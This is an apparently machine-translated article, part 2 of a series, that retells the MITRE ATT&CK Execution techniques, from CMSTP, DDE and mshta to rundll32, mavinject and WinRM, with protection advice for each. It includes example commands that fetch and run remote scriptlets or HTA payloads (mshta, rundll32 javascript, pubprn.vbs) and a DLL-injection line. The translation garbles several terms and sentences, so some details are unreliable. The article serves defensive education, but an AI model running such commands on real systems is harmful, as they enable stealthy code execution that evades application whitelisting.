We study Adversarial Tactics, Techniques & Common Knowledge (ATT @ CK). Enterprise Tactics. Part 2


    Links to all parts:
    Part 1. Obtaining initial access (Initial Access)
    Part 2. Execution (Execution)
    Part 3. Consolidation (Persistence)
    Part 4. Privilege Escalation
    Part 5. Defense Evasion
    Part 6. Obtaining credentials (Credential Access)
    Part 7. Discovery (Discovery)
    Part 8. Lateral Movement

    The “Execution” phase describes the use of tools and methods for remote and local execution of various commands, scripts and executables by an attacker. files that were delivered to it at the previous one ne

    The author is not responsible for the possible consequences of the application of the information contained in the article, and also apologizes for any inaccuracies in some formulations and terms. The published information is a free recount of the content of MITER ATT & CK.


    System: macOS
    Permissions: User
    Description: AppleScript language has the ability to work with Apple Event - messages exchanged between applications within the framework of interprocess communication (IPC). Using Apple Event, you can interact with almost any application that is open locally or remotely, triggering events such as opening windows and pressing keys. Scripts are run using the command: Osascript -e <script> .
    Attackers can use AppleScript to hide SSH connections to remote hosts in secret, providing fake dialog boxes to users. AppleScript can also be used in more common types of attacks, such as the Reverse Shell organization.

    Protection recommendations: Mandatory verification of running AppleScript scripts for the signature of a trusted developer.

    CMSTP (AppLocker ByPass - CMSTP)

    System: Windows
    Permissions: User
    Description: The Microsoft Connection Manager Profile Installer (cmstp.exe) is the “ Connection Manager Profile Installer ” built into Windows. Cmstp.exe can take an inf-file as a parameter, so an attacker can prepare a special malicious INF for loading and executing DLLs or scriptlets (* .sct) from remote servers, bypassing AppLocker and other locks, because cmstp.exe is signed with a Microsoft digital certificate.

    Protection recommendations: Blocking the launch of potentially dangerous applications. Runs monitoring C: \ Windows \ System32 \ cmstp.exe .

    Command Line Interface (Command-Line Interface)

    System: Windows, Linux, macOS
    Permissions: User, Administrator, System
    Description: You can interact with the command line interface locally, remotely using remote access software, using Reverse Shell, etc. Commands are executed with the current permission level of the command-line interface process if the command does not include a process call that changes permissions to execute the command (for example, a scheduled task).

    Security Tips: Auditing and / or Command Line Blocking Using Tools such as AppLocker or Software Restriction Policies.

    Control Panel Items (Windows Control Panel Items)

    System: Windows
    Permissions: User, Administrator, System
    Description: The tactic is to use the elements of the Windows Control Panel to execute arbitrary commands (for example, the Reaver virus ) by attackers . Malicious objects can be disguised as standard controls and delivered to the system using phishing attachments. Utilities for viewing and configuring Windows settings are registered exe-files and CPL-files of Windows control panel elements. CPL files are actually renamed DLLs that can be run in the following ways:
    • directly from the command line: control.exe <file.cpl> ;
    • using API functions from shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
    • double click on the cpl file.

    Registered CPLs stored in System32 are automatically displayed in the Windows Control Panel and have a unique identifier stored in the registry:
    HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpace

    Information about other CPLs , such as the display name and cpl path -files are stored in the “Cpls” and “Extended Properties” sections of the section:
    HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control Panel

    Some CPLs launched through the command shell are registered in the section:
    HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlers

    Protection Recommendation:Restriction of launching and storing control panel files in protected folders only (for example, C: \ Windows \ System32 ), including User Account Control (UAC) and AppLocker to prevent unauthorized changes to the system. Of course, the use of anti-virus software.

    Dynamic Data Exchange Protocol (DDE), Macro-less Code Exec in MSWord

    System: Windows
    Permissions: User
    Description: DDE is an application interaction protocol that shares data and shared memory for messaging. For example, a Word document may contain a table automatically updated from an Excel document. The technique is to exploit a vulnerability in MS Office applications related to the use of the DDE protocol in MS Office. Malicious users can embed objects into the MS Office documents that contain commands that will be executed when the document is opened. For example, a Word document may contain a Field object (Field), in the value of which is specified the {DDEAUTO <command, for example, c: \ windows \ system32 \ cmd.exe>}to be executed when opening a document. Despite the loss of relevance, DDE can be enabled, including in Windows 10 and MS Office 2016, using the key:
    AllowDDE (DWORD) = 2 in the registry section:
    HKEY_CURRENT_USER \ Software \ Microsoft \ Office \ <Office version \ Word \ Security .

    Security Tips: Follow Microsoft recommendations and install the appropriate MS Office update . In Windows 10, you can also enable the Attack Surface Reduction (ASR) parameter to protect against DDE attacks and spawning of child processes by MS Office applications.

    Execution through API (Execution through API)

    System: Windows
    Rights: User, Administrator, System
    Description: Attackers can use the API to execute binary files. API functions such as CreateProcess allow programs and scripts to start processes with an indication of the necessary paths and arguments. API functions that can be used to execute binaries:
    • CreateProcessA (), CreateProcessW ();
    • CreateProcessAsUserA (), CreateProcessAsUserW ();
    • CreateProcessInternalA (), CreateProcessInternalW ();
    • CreateProcessWithLogonW (), CreateProcessWithTokenW ();
    • LoadLibraryA (), LoadLibraryW ();
    • LoadLibraryExA (), LoadLibraryExW ();
    • LoadModule ();
    • LoadPackagedLibrary ();
    • WinExec ();
    • ShellExecuteA (), ShellExecuteW ();
    • ShellExecuteExA (), ShellExecuteExW ().

    Security Tips : Calls to API functions are common and difficult to distinguish from malicious activity. The protection vector should be aimed at preventing the attacker from launching tools at the beginning of the attack chain, identifying malicious behavior and blocking potentially dangerous software.

    Execution through the Windows module loader (Execution through Module Load)

    System: Windows
    Permissions: User
    Description: It is possible to organize the execution of the code using the Windows module loader - NTDLL.dll, which can load the DLL library on an arbitrary local or network path. NTDLL.dll is part of the Windows API and can call functions such as CreateProcess () and LoadLibrary () .

    Protection recommendations: Calls to API functions are standard OS functionality that is difficult to distinguish from malicious activity. The protection vector should be aimed at preventing the launch of the attacker's tools at the beginning of the attack chain. it makes sense to consider limiting the loading of DLLs with the % SystemRoot% and % ProgramFiles% directories.

    Exploitation for Client Execution

    System: Windows, Linux, macOS
    Permissions: User
    Description: The technique involves remote code execution using exploits in user software. The presence of vulnerabilities in software is often associated with the violation of software requirements of secure programming by software developers, which ultimately leads to the possibility of causing unexpected software behavior.
    Consider some types of exploits:
    • Browser exploits. Web browsers are targeted when malicious users use shadow downloads and phishing links. The attacked system can be compromised through a normal browser after the user performs certain actions, for example, clicking on the link indicated in the phishing letter.
    • Office application exploits. Malicious files are transmitted as attachments or download links. To exploit the vulnerability, the user must open the document or file to launch the exploit.
    • Third-party application exploits. Common applications such as Adobe Reader and Flash, often used in corporate environments, are targeted by intruders. Depending on the software and the nature of the vulnerability, exploitation of vulnerabilities occurs in the browser or when a user opens a file, for example, Flash objects can be delivered in MS Office documents.

    Protection recommendations: Timely installation of updates used applications. The use of various means of isolation of potentially vulnerable applications - sandboxes, microsegmentation and virtualization tools, for example, Sandboxie for Windows and Apparmor, Docker for Linux. It is also recommended to use systems for protection against exploits, for example, Windows Defender Exploit Guard (WDEG) for Windows 10 or Enhanced Mitigation Experience Tool Tool (EMET) for earlier versions of Windows.

    Graphical User Interface

    System: Windows, Linux, macOS
    Permissions: User, Administrator, system
    Description: Executable file or script is launched when interacting with a file through a graphical user interface (GUI) in an interactive or remote session, for example, via the RDP protocol.

    Security Tips : Protect credentials that can be used to connect to the system remotely. Identify unnecessary system utilities, third-party software that can be used to enter interactive remote mode.


    System: Windows
    Permissions: User
    Description: InstallUtil is a Windows command line utility that can install and uninstall applications that comply with the .NET Framework specifications. Installutil is automatically installed with VisualStudio. The InstallUtil.exe file is signed with a Microsoft certificate and is stored in:
    C: \ Windows \ Microsoft .NET \ Framework \ v [version] \ InstallUtil.exe
    Attackers can use the InstallUtil functionality to proxy code execution and bypass white-letter applications. Security Tips

    : Your InstallUtil may not be used on your system, so consider blocking the launch of InstallUtil.exe.

    LSASS Drivers (LSASS Driver)

    System: Windows
    Permissions: Administrator, system
    Description: Local Security Authority (LSA) is a Windows subsystem that provides user authentication. LSA includes several dynamic interconnected DLLs that are executed in the LSASS.exe process. Attackers can attack LSASS.exe by replacing or adding illegitimate LSA drivers and then executing arbitrary code. The technique is implemented in the Pasam and Wingbird malware, which “throw” modified DLLs used when loading LSASS. In this case, the malicious code is executed before an illegitimate DLL causes a crash and a subsequent crash of the LSASS service.

    Protection recommendations:In Windows 8.1 and Windows Server 2012 R2, enable LSA protection by setting the registry key:
    HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ RunAsPPL
    to dword: 00000001

    This protection ensures that the downloaded LSA plug-ins and drivers are signed with a Microsoft digital signature. In Windows 10 and Server 2016, enable Windows Defender Credential Guard to run lsass.exe in an isolated virtual environment. Enable the DLL safe search mode in order to reduce the risk of malicious libraries loading into lsass.exe:
    HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ SafeDllSearchMode .


    System: macOS
    Permissions: User, Administrator
    Description: Launchctl is a utility for managing Launchd service. With Launchctl, you can manage system and user services (LaunchDeamons and LaunchAgents), as well as execute commands and programs. Launchctl supports command line subcommands, interactive or redirected from standard input:
    launchctl submit -l [labelname] - / Path / to / thing / to / execute '' arg "'' 'arg"' '' arg " .
    Starting and restarting services and malefactors can execute code and even bypass the whitelist if the launchctl is an allowed process, but loading, unloading and reloading services and daemons may require elevated privileges.

    Restricting user rights to create Launch Agents and launch Launch Deamons through group policy. Using the KnockKnock app, you can discover programs that use launchctl to manage Launch Agents and Launch Deamons.

    Execution using local scheduling tasks (Local Job Scheduling)

    System: Linux, macOS
    Privileges: User, Administrator, root
    Description: Attackers can create tasks in the attacked systems for unauthorized launch of programs when the system boots or on a schedule. On Linux and Apple systems, several methods for scheduling periodic background tasks are supported: cron, at, launchd. Unlike Windows Task Scheduler, task scheduling on Linux systems cannot be performed remotely, except for using remote sessions like SSH.

    Protection recommendations: Restricting user rights to create scheduled tasks, blocking system utilities and other software that can be used to schedule tasks.


    System: Windows
    Permissions: User
    Description: Mshta.exe (located in C: \ Windows \ System32 \ ) is a utility that executes Microsoft HTML applications (* .HTA). HTA applications are run using the same technologies that InternetExplorer uses, but outside of the browser. Due to the fact that Mshta processes files bypassing browser security settings, attackers can use mshta.exe to proxy malicious HTA files, Javascript or VBScript. The malicious file can be launched using the built-in script:
    mshta vbscript: Close (Execute (“GetObject (” “script: https [:] // webserver / payload [.] Sct” ")"))

    or directly by URL:
    mshta http [:] // webserver / payload [.] hta

    Security Tips : The mshta.exe functionality is associated with older versions of IE that have reached the end of their life cycle. Block Mshta.exe if you are not using its functionality.


    System: Windows
    Permissions: User, Administrator
    Description: PowerShell (PS) is a powerful interactive command-line interface and scripting environment included with Windows. Attackers can use PS to gather information and execute code. For example, the Start-Process cmdlet can start an executable file, the Invoke-Command cmdlet will execute a command locally or on a remote computer. PS can also be used to download and run executable files from the Internet, without saving them to your hard drive. For remote connections using PS, administrative rights are required. There are a number of tools for attacking PS:

    Protection tips: PS can be removed from the system if it is not necessary. If PS is required, then you should limit the ability of administrators to run it and only execute signed scripts. Disable the WinRM service to prevent remote execution of PS scripts. It should be noted that there are methods for circumventing the policies for executing PS scripts .

    Regsvcs / Regasm

    System: Windows
    Permissions: User, Administrator
    Description: Regsvcs and Regasm are Windows utility utilities used to register in the .NET Component Object Model (COM) assembly system. Both files are digitally signed by Microsoft. Criminals can use Regsvcs and Regasm to proxy code when the code that must be run before registering or unregistering is specified as an attribute: [ComRegisterFunction] or [ComUnregisterFunction]. The code with such attributes can be run even if the process is executed with insufficient privileges or even “crashes” at startup.

    Security Tips : Block Regsvcs.exe and Regasm.exe if they are not used on your system or network.

    Regsvr32 (Squiblydoo)

    System: Windows
    Permissions: User, Administrator
    Description: Regsvr32.exe is a console utility for registering and unregistering OLE controls in the registry, for example, ActiveX and DLL libraries. Regsvr32.exe is digitally signed by Microsoft and can be used to proxy code execution. For example, using Regsvr32, you can load an XML file that contains pieces of Java code (scriptlets) that will be performed to bypass the white list.

    Protection Recommendations: Attack Surface Reduction (ASR) in EMET and Advanced Theart Protection in Windows Defender can block the use of Regsvr32.exe to bypass white lists.

    Rundll32 (Poweliks)

    System: Windows
    Permissions: User
    Description: Rundll32.exe is a system utility for running programs in dynamic link libraries that can be called to proxy a binary file, execute Windows control files (.cpl) through undocumented functions of shel32.dll - Control_RunDLL and Control_RunDLLAsUser . Double-clicking on the .cpl file also causes Rundll32.exe to execute. Rundll32 can also be used to execute scripts such as javascript:
    rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] Example [ .] com / malicious.sct ")"
    The above described method of using rundll32.exe is detected by antivirus software like a virus like Poweliks.
    Protection Tips: Attack Surface Reduction (ASR) in EMET and Advanced Theart Protection in Windows Defender can block the use of Rundll32.exe to bypass white lists.

    Running with Windows task scheduling (Scheduled Task)

    System: Windows
    Permissions: User, Administrator, System
    Description: Utilities such as at, schtasks and Windows Task Scheduler can be used to schedule the launch of programs and scripts that will be executed at a specific date and time. The task can be scheduled on the remote system, provided that RPC is used for authentication and printer and file sharing is enabled. In addition, administrator scheduling is required to schedule tasks on the remote system. Malicious users can use remote task scheduling to execute programs at system startup or in the context of a specific account.

    Recommendations on protection: Enable the restriction of rights to create tasks by users on behalf of System in the registry:
    HKLM \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ SubmitControl = 0
    Note: SubmitControl = 1 will allow tasks to be created by members of the Server Operators group.

    Also perform the appropriate GPO configuration:
    Computer Configuration> Policies> Windows Settings> Security Settings> Policies
    > Security Settings> Local Settings Policies> User Rights Assignment: Increase scheduling priority
    Consider the feasibility of using the PowerSploit Framework, which contains the PowerUP module for finding vulnerabilities in scheduled task permissions, in its activities.


    System: Windows, Linux, macOS
    Permissions: User
    Description: Attackers can use scripts to automate their actions, speed up operational tasks and, as a result, reduce the time required to gain access. Some scripting languages ​​can be used to bypass the process monitoring mechanisms by directly interacting with the OS at the API level instead of calling other programs. Scripts can be embedded in Office documents as macros and then used for a phishing attack. In this case, the attackers are counting on the user launching a file with a macro or that the user agrees to activate the macro. There are several popular scripting frameworks - Metasploit, Veil, PowerSploit.

    Security Tips: Restrict access to scripts such as VBScript or PowerShell. On Windows, configure MS Office security settings by enabling secure viewing and disabling macros via GPO. If macros are needed, then allow only signed, digitally signed macros to run. Use microsegmentation and application virtualization, for example, Sandboxie for Windows and Apparmor, Docker for Linux.

    Start of services (Service Execution)

    System: Windows
    Rights: Administrator, System
    Description: Attackers can execute binary code, a command or a script using special methods of interacting with Windows services, for example, using the Service Management Manager (SCM), you can create new services and modify running ones.

    Protection recommendations:Make sure that the current system privilege setting prevents users with low privileges from starting services with high privileges. Make sure that executable files with high permissions in the system cannot be replaced or modified by users with lower permissions. Consider the use of tools to restrict the launch of potentially dangerous programs using AppLocker and setting software restriction policies ( Software Restriction Policies ).

    Execution through signed binaries (Signed Binary Proxy Execution)

    System: Windows
    Permissions: User
    Description: Binary files signed with trusted digital certificates can run on Windows systems protected with digital signature verification. Several Microsoft default signed files when installing Windows can be used to proxy other files to run:
    Mavinject.exe is a Windows utility that allows you to execute code. Mavinject can be used to enter a DLL into a running process:
    "C: \ Program Files \ Common Files \ microsoft shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH DLL]
    C: \ Windows \ system32 \ mavinject.exe [PID ] / INJECTRUNNING [PATH DLL]
    SyncAppvPublishingServer.exe- can be used to run powershell scripts without running powershell.exe.
    There are several similar binaries .

    Security Tips: Many signed files may not be used on your system, so consider blocking their launch.

    Execution through signed scripts (Signed Script Proxy Execution)

    System: Windows
    Permissions: Users
    Description: Scripts signed with trusted certificates can be used to proxify malicious files, for example, the PubPrn.vbs file is signed with a Microsoft certificate and can be used to launch a file from a remote server:
    cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ ru-RU \ pubprn.vbs script: http [:] //

    Security Recommendations: Such signed scripts may not be required on your system, therefore consider blocking their launch.

    Source Team

    System: Linux and macOS
    Privileges: User
    Description: Source is a command that allows you to read and execute all commands from a specified file in the current command shell, which means that all the specified environment variables will be visible in all scripts and commands that will be launched. Source can be launched in two ways:
    source / path / to / filename [arguments] or . / path / to / filename [arguments]
    Note the space after the dot. Without a space, the program will run in a new command shell. Attackers can use Source to execute files unlabeled with the “x” flag as executable.

    Protection recommendations: Preventing the use of built-in commands in the system is rather difficult due to their legality, so the protection vector must be directed at preventing malicious actions at earlier stages of the attack, for example, at the delivery stage or creating a malicious file in the system.

    Space after file name (Space after Filename)

    System: Linux, macOS
    Permissions: User
    Description:Attackers can hide the true file type by changing its extension. With certain file types (does not work with .app files), adding a space character to the end of the file name will change the way the operating system processes the file. For example, if there is a Mach-O executable file called evil.bin, then when the user double-clicks the OS, he will start Terminal.app and execute it. If the same file is renamed to evil.txt, then double-click it to start in a text editor. However, if the file is renamed to “evil.txt” (space at the end), then when you double-click the type of the true file, the OS will be determined and the binary file will start. Attackers can use this technique to deceive the user and launch a malicious executable file.

    Protection recommendations:The use of this technique is difficult to prevent, because An attacker uses standard operating system mechanisms, so the protection vector must be directed at preventing malicious actions at earlier stages of the attack, for example, at the delivery stage or creating a malicious file in the system.

    Run with third-party network administration software (Third-party Software)

    System: Windows, Linux, macOS
    Permissions: User, Administrator, System
    Description: The attack vector is directed to third-party software and software deployment systems that are used on the attacked network for administrative purposes (SCCM, VNC, HBSS, Altris, etc.). If an attacker gains access to such systems, the adversary will be able to remotely execute code on all the hosts connected to the software deployment system. The rights required to implement this technology depend on the specific configuration of the systems. Local credentials may be sufficient to access the software deployment server, however, an administrator account may be required to run the software deployment.

    Protection recommendations:Check the security level of your software deployment systems. Ensure that access to software management systems is limited, controlled and protected. Strictly enforce mandatory prior approval policies for remote software deployment. Provide access to software deployment systems to a limited number of administrators, ensure isolation of the software deployment system. Make sure that the access credentials for the software deployment system are unique and not used in other services on the corporate network. If the software deployment system is configured to run only signed binaries, then verify that trusted certificates are not stored in the software deployment system itself, but are located in a system that cannot be accessed remotely.

    Trap Team

    System: Linux, macOS
    Rights: User, Administrator
    Description: The trap command is used to protect the script from interruptions (ctrl + c, ctrl + d, ctrl + z, etc.). If the script receives an interrupt signal specified in the arguments of the trap command, then it processes the interrupt signal itself, and the command shell will not process such a signal. Attackers can use trap to register code that will be executed when the shell receives certain interrupt signals.

    Protection recommendations:The use of this technique is difficult to prevent, because the attacker uses regular operating system mechanisms. The protection vector should be directed to the prevention of malicious actions at earlier stages of an attack, for example, at the delivery stage or the creation of a malicious file in the system.

    Execution through trusted software development utilities (Trusted Developer Utilities)

    System: Windows
    Rights: User
    Description: There are many utilities that are used by software developers and which can be used to execute code in various forms during software development, debugging and reverse engineering. These utilities are often signed with digital certificates that allow them to perform malicious code proxying in the OS, bypassing the protection mechanisms and white sheets of applications.

    MSBulidIs a software creation platform used in Visual Studio. It uses projects in the form of XML files that describe the requirements for building various platforms and configurations. MSBuild from .NET version 4 allows you to insert C # code into an XML project, compile it, and then execute it. MSBulid.exe is signed with a Microsoft digital certificate.
    DNX - .Net Execution Environmant (dnx.exe) is a software development kit (development kit) in Visual Studio Enterprise. Dropped since .NET Core CLI in 2016. DNX is not available in standard Windows builds and can only be present on developer hosts when using .Net Core and ASP.NET Core 1.0. Dnx.exe is signed with a digital certificate and can be used to proxy code execution.
    RCSI- non-interactive command interface for C #, similar to csi.exe. It was introduced in an early version of the Roslyn .Net compiler platform. Rcsi.exe is signed with a Microsoft digital certificate. C # .csx script files can be written and executed using Rcsi.exe on the Windows command line.
    WinDbg / CDB is the MS Windows kernel and debugging utility in user-mode. The Microsoft cdb.exe console debugger is also a user-mode debugger. Both utilities can be used as standalone tools. Usually used in software development, reverse engineering and can not be found in conventional Windows systems. Both WinDbg.exe and CDB.exe are signed with a Microsoft digital certificate and can be used to code proxies.
    Tracker- file tracking utility tracker.exe. Included in .NET as part of MSBuild. It is used to register calls in the Windows 10 file system. Attackers can use tracker.exe to execute DLLs in various processes. Tracker.exe is also signed with a Microsoft certificate.

    Protection recommendations: All the above files are to be removed from the system if they are not used for their intended purpose by users.

    User Execution

    System: Windows, Linux, macOS
    Permissions: User
    Description: Attackers can rely on certain user actions in order to take certain actions. This can be direct code execution when a user opens a malicious executable file, delivered as a phishing attachment with an icon and a visible file extension of the document. Sometimes, other techniques can also be used, for example, when a user clicks on a link in a phishing email, which results in exploiting a browser's vulnerability. The “user executable” technique is often used at other stages of an invasion, for example, when an attacker places a file in a common directory or on the user's desktop, relying on the fact that he “clicks” on it.

    Protection tips: Increase user awareness. Block download files such as .scr, .exe, .pif, .cpl, etc. The use of anti-virus software and the introduction of IPS-systems.

    Windows Management Instrumentation (WMI)

    System: Windows
    Permissions: User, Administrator
    Description: WMI is a Windows administration toolkit that provides local and remote access to Windows system components. WMI uses SMB and RPCS (runs on port 135). Attackers can use WMI to interact with local and remote systems, and also as a means to perform many tactical operations, such as gathering information at the stage of discovery and remotely executing files during the “literal movement”.

    Protection recommendations:Disabling WMI and RPCS can lead to system instability. By default, only administrators can connect to the system remotely via WMI. Prevent overlapping rights for administrative and other privileged accounts.

    Windows Remote Management (WinRM)

    System: Windows
    Permissions: User, Administrator
    Description: Windows Remote Management (WinRM) is the name of the service and protocol that allows the user to interact remotely with the system (for example, starting a file, changing the registry, changing the service. To start, use the winrm command and other programs ., such as PowerShell

    Advice on protection: Disable the WinRM If it is necessary, insulate infrastructure WinRM with separate accounts and permission should be.. recommendations WinRM on configuring authentication methods and use randmauerov host to allow access to WinRM only with certain devices.

    Also popular now: